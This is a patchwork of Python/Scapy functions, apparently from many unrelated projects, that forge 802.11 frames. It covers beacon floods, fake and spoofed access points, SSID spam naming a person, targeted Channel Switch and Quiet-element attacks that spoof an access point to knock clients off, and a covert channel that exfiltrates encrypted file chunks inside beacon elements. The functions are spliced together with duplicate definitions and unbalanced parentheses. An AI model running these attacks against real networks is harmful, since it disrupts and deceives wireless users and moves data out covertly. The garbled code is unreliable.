def stormWithBeaconFrames(): global interfaceName global monitorInterface log("Starting with storming on interface [{}]".format(interfaceName)) netSSID = 'testSSID' #Network name here iface = 'wlan0mon' #Interface name here dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn frame.show() print("\nHexdump of frame:") hexdump(frame) raw_input("\nPress enter to start\n") sendp(frame, iface=iface, inter=0.100, loop=1)
def createAccessPoint(interface, ssid): dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33') beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn log.info("Beacon Frame created with SSID: '" + ssid + "'") log.info("Transmitting Beacon through interface '" + interface + "'") raw_input("\nPress Enter to start Access Point '" + ssid + "'\n") log.success("Access Point Created!") sendp(frame, iface=interface, inter=0.10, loop=1)
def ssidSpawner(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) frames = [] while True: #for netSSID in ssids: netSSID = id_generator() print(netSSID) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn print("SSID=%-20s %r"%(netSSID,frame)) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1)
def quietAttack(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) timeToRun = (time.time() + config["time"]) dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"])) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x01\x00')) #RSN Capabilities (no extra capabilities) quiet = Dot11Elt(ID='Quiet', info=( '\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct) '\x00' #Quiet period | #0 indicates no quiet periods are scheduled. A non-zero value indicates the number of beacon intervals between each period. '\x00\x10' #Quiet duration | length of quiet period in time units (TU). '\x00\x00')) #Quiet offset | possiblity to specify other start time than right after beacon in TU, But has to be shorther than beacon interval. frame = RadioTap()/dot11/beacon/essid/quiet printTime() while(time.time() < timeToRun): sendp(frame, iface=config["iface"], loop=0, verbose=0) time.sleep(config["interval"]) printTime()
def test(): netSSID = 'testSSID' #Network name here iface = 'mon5' #Interface name here dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22', addr3='33:33:33:33:33:33') beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn frame.show() print("\nHexDump of frame:") hexdump(frame) raw_input("\nPress enter to start\n") sendp(frame, iface=iface, inter=0.100, loop=1)
def send_file(filename): print("[*] Sending data...") f = open(filename, 'rb') file_size, chunks, r_size = stat_file(filename) pos = 0 start = time.time() for seq in range(chunks): m_seq = str(seq) #print(f"\t[i] tag: {m_seq}") seq_c = box.encrypt(bytes(m_seq, 'ascii')) _seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c)) #print(f"\t[i] tag size: {len(_seq)}") chunk = f.read(r_size) # crypto ovh + element ovh chunk_c = box.encrypt(chunk) _data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c)) #print(f"\t[i] encrypted data size: {len(chunk_c)}") _frame = t_frame / _seq / _data sendp(_frame, iface=if0, verbose=0, realtime=True) tell = f.tell() print( f"\t[i] sent frame {seq} of {chunks}, data[{pos}:{tell}], frame size: {len(_frame)}" ) pos = tell #input("[debug check]") end = time.time() print(f"[*] sent {chunks} in {end - start} seconds") band = (chunks * 325) / (end - start) print(f"[*] speed: {(band * 8) / 1000} kbps") print("[*] listening for chunk resend") sniff(iface=opt.iface, stop_filter=check_missing, monitor=True) print("[*] done!")
def main(): ssids = sys.argv[2:] #Network name here iface = sys.argv[1] #Interface name here frames = [] for netSSID in ssids: print netSSID dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn print "SSID=%-20s %r" % (netSSID, frame) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def main(): if len(sys.argv) < 3: print("usage: %s <interface> <words of name>" % sys.argv[0]) sys.exit(1) iface = sys.argv[1] name = ' '.join(sys.argv[2:]) frames = [] for suffix in ap_slander: ssid = name + ' ' + suffix.upper() print(ssid) dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn #print("SSID=%-20s %r"%(ssid,frame)) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def create_beacon(name, password_protected=False): dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon( cap='ESS+privacy' if password_protected else 'ESS') essid = Dot11Elt(ID='SSID', info=name, len=len(name)) if not password_protected: return RadioTap() / dot11 / beacon / essid rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) return RadioTap() / dot11 / beacon / essid / rsn
def channelSwitchAttack(config): frame = "" frameType = "beacon" #choose betweeen action_frame or beacon. #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) timeToRun = (time.time() + config["time"]) print("Sending channelSwitchBeacon to " + str(config["mac"]) + " from: " + config["bssid"] + " on channel: " + str(config["channel"])) if(frameType == "action_frame"): dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) category = ('\x00' # spectrum management '\x04') #channel switch announcement csa = Dot11Elt(ID='Channel Switch', info=( '\x00' #Channel switch mode '\x04' #new channel )) '\x00')) #channel switch cnt frame = RadioTap()/dot11/category/csa elif(frameType == "beacon"): dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"])) csa = Dot11Elt(ID='Channel Switch', info=( '\x00' #Channel switch mode '\x64' #new channel )) '\x00')) #channel switch cnt frame = RadioTap()/dot11/beacon/essid/csa printTime() while(time.time() < timeToRun): #frame.show() sendp(frame, iface=config["iface"], loop=0, verbose=0) time.sleep(config["interval"]) printTime()
def recv_missing(tally): msg = ":".join(str(x) for x in tally) msg_c = box.encrypt(msg.encode('utf-8')) fname = t_file fname_c = box.encrypt(t_file.encode('utf-8')) _data = Dot11Elt(ID=224, info=msg_c, len=len(msg_c)) _fname = Dot11Elt(ID=225, info=fname_c, len=len(fname_c)) sendp(t_frame / _data / _fname, iface=opt.iface)
def probe_resp(self, message): subtype = 5 frame = self.base_frame(subtype, message=message) rates = Dot11Elt(ID='Rates', info=self.rates) dsset = Dot11Elt(ID='DSset', info=self.dsset) frame = frame / rates / dsset print("[*] 802.11 Probe Response: SSID = %s" % self.net_ssid) sendp(frame, iface=self.interface, inter=0.100, loop=0, verbose=False)
def probe_req(self, message=''): subtype = 4 frame = self.base_frame(subtype, message=message) rates = Dot11Elt(ID='Rates', info=self.rates) dsset = Dot11Elt(ID='DSset', info=self.dsset) frame = frame / rates / dsset print("[*] 802.11 Probe Request: SSID = %s" % self.net_ssid) srp(frame)
def build(name): dot11_header = Dot11(type=0, subtype=8, addr1=dest, addr2=source, addr3=source) beacon = Dot11Beacon(cap=0x1111) data = ( beacon / Dot11Elt(ID="SSID", info=ssid(name)) / Dot11Elt(ID="Rates", info=bytes([140, 18, 152, 36, 176, 72, 96, 108]))) return RadioTap() / dot11_header / data
def geracao_pacotes(self): netSSID = 'testSSID' iface = 'wlp3s0mon' #Nome da Interface Wireless mac_forjado_pr = self.criacao_mac_ponto_referencia() numero_pacotes = int(self.numero_pacotes.get()) intervalo_envio = float(self.intervalo.get()) ## addr1 = MAC de destino (MAC da placa wireless) ## addr2 = Endereco MAC de origem do remetente. (MAC forjado) ## addr3 = Endereco MAC do ponto de acesso. dot11 = Dot11(type=0, subtype=8, addr1='E4:18:6B:4B:94:00', addr2=mac_forjado_pr, addr3='33:33:33:33:33:33') beacon = Dot11Beacon( cap='ESS+privacy') ## indica a capacidade do ponto de acesso essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID)) rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn frame.show() print("HexDump of frame") hexdump(frame) a = sendp(frame / "RURALRURALRURAL", iface=iface, inter=intervalo_envio, loop=0, count=numero_pacotes ) # inter = intervalo entre o envio dos pacotes print(a) self.atualizar_tela()
def encapsulate(payload, addr_from, addr_to=BroadcastAddress): from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap radio = RadioTap() dot11 = Dot11(type=0, subtype=8, addr1=addr_to, addr2=SignatureAddress, addr3=addr_from) beacon = Dot11Beacon(cap='ESS') frame = radio / dot11 / beacon data_size = len(payload) data_left = data_size data_off = 0 chunk_size = 255 while data_left > 0: sz = min(chunk_size, data_left) chunk = payload[data_off:data_off + sz] frame /= Dot11Elt(ID=Dot11ElemID_Identity, info=chunk, len=sz) data_off += sz data_left -= sz return frame
def create_packet(packet): #hexdump(packet) if packet.haslayer(Dot11Beacon): # extract the MAC address of the network bssid = packet[Dot11].addr2 # get the name of it ssid = packet[Dot11Elt].info.decode() # extract network stats stats = packet[Dot11Beacon].network_stats() # get the channel of the AP channel = stats.get("channel") # calculate the new channel newChannel = (channel + 6) % 11 # get the end of the original packet oldEltend = packet[Dot11Elt][3] # get the content of original packet newPacket = packet # change the DSset to the new calculate value. This will clear everything that follows newPacket[Dot11Elt][2] = Dot11Elt(ID='DSset', info=chr(newChannel), len=1) # concatenate the end of the packet with what we created before finalPacket = newPacket / oldEltend # send the packet until user stop it sendp(finalPacket, iface=args.Interface, inter=0.10, loop=1)
def send_stat(filename): file_size, chunks, r_size = stat_file(filename) print("[*] Sending file stat frame...") payload = f"{file_size}:{chunks}".encode('ascii') payload_c = box.encrypt(payload) _payload = Dot11Elt(ID=222, info=payload_c, len=len(payload_c)) tmp_frame = t_frame / _payload sendp(tmp_frame, iface=if0, verbose=0, realtime=True)
def sendAssocReq(): #packet to client dot11 = Dot11(type=0, subtype=0, addr1=config["bssid"], addr2=config["mac"], addr3=config["mac"]) auth = Dot11AssoReq(ID=ESS, info='\x01')#ESS=0x0, privacy=0x1) essid = Dot11Elt(ID='SSID',info="wips-test-psk", len=len("wips-test-psk")) #rsn omzetten naar Dot11EltRSN rsn = Dot11Elt(ID='RSNinfo', info=( '\x01' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/auth/essid#/rsn frame.show() sendp(frame, iface=config["iface"], inter=0.100, loop=0)
def send_chunks(filename, chunk_list): file_size, chunks, r_size = stat_file(filename) with open(filename, 'rb') as f: for seq in chunk_list: m_seq = str(seq) seq_c = box.encrypt(bytes(m_seq, 'ascii')) _seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c)) chunk_offset = (r_size * seq) f.seek(chunk_offset) chunk = f.read(r_size) chunk_c = box.encrypt(chunk) _data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c)) _frame = t_frame / _seq / _data sendp(_frame, iface=if0, verbose=0, realtime=True) tell = f.tell() print( f"\t[i] resent frame {seq} of {chunks}, data[{chunk_offset}:{tell}], frame size: {len(_frame)}" )
def gen_packet(ssid, source_mac): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=source_mac, addr3=source_mac) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) rsn = Dot11Elt(ID="RSNinfo", info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn return frame
def send_beacon(mac, ssid, verbose = False): dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac, type=0, subtype=8) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) frame = RadioTap() / dot11 / beacon / essid if verbose: print(f"Sending beacon: {ssid}") sendp(frame, inter=0.1, loop=1, iface=interface, verbose=0)
def _send_802_11_frame(self, ssid): dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff", addr2=self.ap.ip,addr3=self.ap.ip) beacon = Dot11Beacon() essid = Dot11Elt(ID='SSID',info=ssid,len=len(ssid)) radiotap = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(self.ap.ch) + '\xc0\x00\xc0\x01\x00\x00') frame = radiotap/dot11/beacon/essid sendp(frame, iface=self.ap.iface, verbose=False)
def __beacon_send(self, ssid, inter, enc): addr2 = gu.rand_mac() addr3 = gu.rand_mac() dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=addr2, addr3=addr3) beacon = Dot11Beacon(cap='ESS') beacon_enc = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt( ID='RSNinfo', info= ('\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00' )) if enc: frame = RadioTap() / dot11 / beacon_enc / essid / rsn else: frame = RadioTap() / dot11 / beacon / essid sendp(frame, iface=self.iface, inter=inter, loop=1)
def size_test_breadth(): global box, t_frame, if0 for i in range(65535): try: m = box.encrypt(('A' * i).encode('ascii')) t_elt = Dot11Elt(ID=253, info=m, len=len(m)) t_elt2 = Dot11Elt(ID=254, info=m, len=len(m)) sendp(t_frame / t_elt / t_elt2, iface=if0, loop=0, inter=0.100, count=1, verbose=0) #input("Continue...") except Exception as e: print("[t] Fail at frame: {}, size: {}\n[e] {}".format( i, i * 4, str(e))) #raise e return False print("[t] absolute unit!") return True
def send(self, ssid='Input your SSID'): random_mac_addr = utils.rand_mac() dot11 = Dot11( type=0, subtype=8, # type : management frame, subtype: beacon frame addr1='ff:ff:ff:ff:ff:ff', addr2=random_mac_addr, addr3=random_mac_addr) beacon = Dot11Beacon() essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid)) rsn = Dot11Elt(ID='RSNinfo', info=('\x01\x00' '\x00\x0f\xac\x02' '\x02\x00' '\x00\x0f\xac\x04' '\x00\x0f\xac\x02' '\x01\x00' '\x00\x0f\xac\x02' '\x00\x00')) frame = RadioTap() / dot11 / beacon / essid / rsn sendp(frame, iface=self.interface, inter=0.100, loop=1)
def base_frame(self, subtype, message=''): frame_type = '' fc = 0 if subtype == 4: frame_type = Dot11ProbeReq() elif subtype == 5: frame_type = Dot11ProbeResp() elif subtype == 8: frame_type = Dot11Beacon(cap='ESS') dot11 = Dot11( type='Management', subtype=subtype, FCfield=fc, # subtype=(4: Probe Request, 8: Beacon) addr1=self.dst, # Receiver address addr2=self.source, # Transmitter address addr3=self.bssid) # BSSID essid = Dot11Elt(ID='SSID', info=self.net_ssid, len=len(self.net_ssid)) base_frame = RadioTap() / dot11 / frame_type / essid if not message: return [] data = str.encode(message) payload = Dot11Elt(ID='vendor', info=data, len=len(data)) frame = base_frame / payload return frame
def quietActionAttack(config): #enable monitor mode and set the channel. setMonitorMode(config["iface"]) setChannel(str(config["iface"]), config["channel"]) timeToRun = (time.time() + config["time"]) dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"]) category = ('\x04' # public action '\x04') #channel switch announcement csa = Dot11Elt(ID='Extended Channel Switch Announcement', info=( '\x00' #Channel switch mode '\x0B' #new channel )) '\x00')) #channel switch cnt quiet = Dot11Elt(ID='Quiet', info=( '\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct) '\x00' #Quiet period | #of beacon intervals to wait in between '\x00\x40' #Quiet duration | length of quiet period in time units (TU) '\x00\x00')) #Quiet offset | possiblity to specify another offset after start time. Unclear? frame = RadioTap()/dot11/category/csa printTime() while(time.time() < timeToRun): sendp(frame, iface=config["iface"], loop=0, verbose=0) time.sleep(config["interval"]) printTime()
def geracao_pacotes(): nome_ponto_referencia = input('Insira o nome do Ponto de Referência: ') mac_forjado_pr = criacao_mac_ponto_referencia(nome_ponto_referencia) tempo_execucao = float(input("Insira o tempo de execucao (minutos): ")) print('\n_________________________________________') intervalo_envio = float( input( "Insira o intervalo de frequencia de envio de pacotes (em segundos) : " )) print('\n_________________________________________') num_pacotes = (tempo_execucao * 60) / intervalo_envio data = "UFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJ" ## addr1 = MAC de destino (MAC da placa wireless) ## addr2 = Endereco MAC de origem do remetente. (MAC forjado) ## addr3 = Endereco MAC do ponto de acesso. dot11 = Dot11(type=2, subtype=0, addr1='E4:18:6B:4B:94:00', addr2=mac_forjado_pr, addr3='33:33:33:33:33:33') essid = Dot11Elt( ID='SSID', info='testSSID', len=len('testSSID')) # indica a capacidade do ponto de acesso frame = RadioTap() / dot11 / essid / data frame.show() input("Digite enter para o inicio do envio de pacotes:") sendp( frame, iface='wlp3s0mon', inter=intervalo_envio, loop=0, count=num_pacotes ) # iface = Nome da Interface Wireless. inter = intervalo entre o envio dos pacotes (em segundos). count = numero de pacotes escreve_arquivo(nome_ponto_referencia, mac_forjado_pr)
def send_beacon_frame(self, inter=0.010, loop=0): # packet duration is 736us in 1Mbps SSID = '000000-0000-0000' mpdu_header = Dot11(type=0, subtype=8, addr1=self.bc_mac, addr2=self.tx_mac, addr3=self.bssid) beacon = Dot11Beacon(timestamp=0, beacon_interval=100, cap=0) essid = Dot11Elt(ID='SSID', info=SSID, len=len(SSID)) vendor_data = Dot11EltVendorSpecific(len=None, oui=0x544a55, info=(b'\x00' + b'\x00' * 8)) frame = self.get_legacy_radiotap( rate=1) / mpdu_header / beacon / essid / vendor_data # hexdump(raw(frame)) sendp(frame, iface=self.iface, inter=inter, loop=loop, verbose=False)